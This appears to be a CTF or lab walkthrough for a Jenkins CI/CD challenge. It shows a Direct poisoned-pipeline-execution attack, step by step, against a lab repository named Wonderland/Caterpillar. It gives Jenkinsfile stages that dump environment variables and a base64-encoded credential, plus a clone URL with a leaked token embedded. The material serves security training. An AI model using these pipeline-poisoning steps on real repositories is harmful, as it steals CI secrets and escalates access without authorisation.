-brightgreen){kind=icon}
Create a pull request originated from a fork and execute a Direct-PPE attack against the Wonderland/Caterpillar repository to elevate your privileges and steal the flag2 secret.
-
Fork the Wonderland/Caterpillar repository.
-
Modify the Jenkinsfile in the fork to print the environment variables into the console output, or send it to a server you control.
stage ('Install_Requirements') { steps { sh ''' env ''' } }
-
Create a pull request based on the fork into the main branch of the original repository. The wonderland-caterpillar-test Jenkins pipeline, originally intended to run tests against the repository code, will be executed.
-
Access the console output of the executed job to get the gitea_token. This token has Write permission on the repository, which effectively allows you to elevate your privileges against the repo.
-
Clone the repository using the token.
git clone http://a644940c92efe2d1876e16a5d29e6c6d7e199b68@localhost:3000/Wonderland/caterpillar.git
-
Modify the Jenkinsfile to load the flag2 secret as an environment variable and print it to the console output (or to send it to a remote host).
stage('deploy') { steps { withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'flag2', passwordVariable: 'TOKEN')]) { sh 'echo $TOKEN | base64' } } }
-
Push the modified Jenkinsfile to the main branch in the repository. The wonderland-caterpillar-prod pipeline will be triggered automatically.
-
Access the console output of the executed job to get the encoded secret.
